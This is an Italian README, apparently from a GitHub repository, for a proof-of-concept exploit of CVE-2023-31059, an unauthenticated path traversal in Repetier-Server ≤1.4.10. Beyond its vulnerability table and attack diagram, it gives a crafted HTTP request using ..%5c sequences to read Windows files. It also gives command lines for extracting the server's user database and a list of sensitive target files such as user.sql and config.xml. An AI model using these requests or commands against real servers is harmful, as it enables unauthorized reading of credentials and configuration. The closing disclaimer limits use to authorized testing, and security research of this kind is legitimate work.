
Exploit proof-of-concept per CVE-2023-31059, un path traversal non autenticato in Repetier-Server ≤1.4.10, che consente la lettura arbitraria di file tramite richieste HTTP appositamente create.
Autore: Mohammed Idrees Banyamer
Ruolo: Ricercatore di Sicurezza
Paese: Giordania 🇯🇴
Exploit proof‑of‑concept per una vulnerabilità remota non autenticata di path traversal / LFI in Repetier‑Server ≤ 1.4.10.
La vulnerabilità consente la lettura arbitraria di file tramite sequenze ..%5c appositamente costruite nell'endpoint connectionLost.php.
| Campo | Valore |
|---|
| Prodotto | Repetier‑Server |
| Versione Affetta | ≤ 1.4.10 |
| CVE | CVE‑2023‑31059 |
| Tipo | Path Traversal / LFI |
| Autenticazione | Nessuna |
| Vettore | Rete |
| Impatto | Lettura Arbitraria di File |
| CVSS | 9.8 Critico |
flowchart LR
A[Attaccante] -->|Richiesta HTTP con traversal ..%5c| B[Repetier Server]
B --> C[base/connectionLost.php]
C -->|Parametro file non sanificato| D[File system Windows]
D --> E[File sensibile]
E --> B
B -->|Contenuto del file nella risposta HTTP| AGET /base/connectionLost.php?file=..%5c..%5cWindows%5cwin.ini HTTP/1.1
Host: target:3344
# Test vulnerability
python3 CVE-2023-31059.py http://<target-ip>:3344/ --test
# Extract user database
python3 CVE-2023-31059.py http://<target-ip>:3344/ \
--file "ProgramData\\Repetier-Server\\database\\user.sql" \
--depth 20
pip install requests
ProgramData\Repetier-Server\database\user.sql
ProgramData\Repetier-Server\config.xml
Windows\win.ini
Windows\System32\drivers\etc\hosts
Questo PoC è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati. Utilizzalo solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione a testare.
GitHub: https://github.com/mbanyamer